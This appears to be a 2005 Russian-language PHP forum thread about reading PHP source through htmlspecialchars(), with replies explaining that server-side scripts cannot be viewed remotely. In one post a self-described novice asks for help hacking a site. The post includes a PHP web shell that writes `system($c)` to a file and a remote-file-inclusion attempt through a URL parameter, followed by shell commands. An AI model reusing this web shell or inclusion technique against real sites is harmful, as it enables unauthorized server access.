|
|
|
|
|
для: napTu3aH
(20.10.2005 в 19:48)
| | Легче вот так))))))
<object data="имя файла.php"></object>
и все) | |
|
|
|
|
|
|
|
для: anubis
(20.10.2005 в 13:13)
| | Вы когда сохраняете или открываете страницу с удаленного хоста, у вас в ней уже нет php скриптов. Рhp это серверный язык, все скрипты выполняються не на клиентской машине, а на сервере. Конечным пользователям уже передается результат выполнения скрипта. Если человек не хочет, чтобы вы видели его скрипты вы их никогда не увидите, разве что взломав сервер и просмотреть скрипт через FTP.
P.S. Честно, без слез на глазах, от смеха, тяжело читать ваш пост :-))) | |
|
|
|
|
|
|
|
для: cheops
(20.10.2005 в 00:38)
| | а вот уменя еше один такой вопрос ответьте мне пожалуйста
Люди вот смотрите я только на чинающий в етой сфере
Конечно вазможно етат вопрос относится не к вашей сфере деятельности смысле в хакинге
но хоть помогите с моим начинающим глупым языком в php
Скажите должно ли ето сработать
вот я нашел сайт кпримеру ::
http:// www.****.ru/cgi-bin/hel.php?z=herr.html
я справляю herr.html на fghfgfgfgfg
он мне пишет мол error software
можно ли применить это действие
я пишу WebSHell в PHP ну типа ::
<?
$su=fopen ("/..../1.php","a+");
$Su_she ="<? echo system ($c); ?>"
fwrite($su, $su_she);
fclose($su);
?>
ето я ставил /..../ потому что я незнаю полной дериктории где назодится сайт
а потом мои действия я залил етот shell на свой сайт ну пусть он бкдет такой ::
www.hacka-all.ru/cgi-bin/Shell.php <- этот файл смясле мой WebShell который я показал выше
а вот что я делал стем подопытным сайтом который а хотел в зломать
http:// www.****.ru/cgi-bin/hel.php?z=www.hacka-all.ru/cgi-bin/Shell.php
запустил в браузире
не чего не изменилось, потом я сделал так http:// www.****.ru/1.php?c=is;pwd;ls -la;
но почему то не чего не вышло не могли бы вы мне как начинающему подсказать почему не получилочь и что я делал не так
Заранее говорю спасибо! | |
|
|
|
|
|
|
|
для: anubis
(19.10.2005 в 22:33)
| | Да фунцкия htmlspecialchars() заменяет все тэги видимыми эквивалентами, для того, чтобы отобразить файл, необходимо прочитать его содержимое и вывести, предварительно пропустив его через функцию htmlspecialchars()
<?php
// Читаем содержимое
$text = file_get_contents("test.php");
// Переводим содержимое в видимую форму
$text = htmlspecialchars($text);
// Выводим содержимое файла
echo $text;
?>
|
| |
|
|
|
|
|
|
|
для: mistersmak
(19.10.2005 в 22:05)
| | а что я спомошью етой функции полпость смогу посмотреть код в файле
а првильно ли я применяю ее
<?php
$new = htmlspecialchars("<a href='test.php'>Test</a>", ENT_QUOTES);
echo $new; // <a href='test'>Test</a>
?>
подсловот test.php я подразумиваю полный путь толька файла который мне интересен для чтения | |
|
|
|
|
|
|
|
для: anubis
(19.10.2005 в 21:26)
| | Интересный у вас язык =)
Если я правильно понял вы хотите чтоб отображался текст скрипта, а не его выполнение, если да, то воспользуйтесь ф-цией htmlspecialchars() | |
|
|
|
|
|
|
| сделать так чтобы можно было прочитать содержимое файла а файл help.php етот файл находится в <form тобиш сдесь находится > </form> я его пытаюсь сохранить он сохраняет результат скрипта тоесть просто скачивается файл с текстом анутри об ощибке | |
|
|
|
|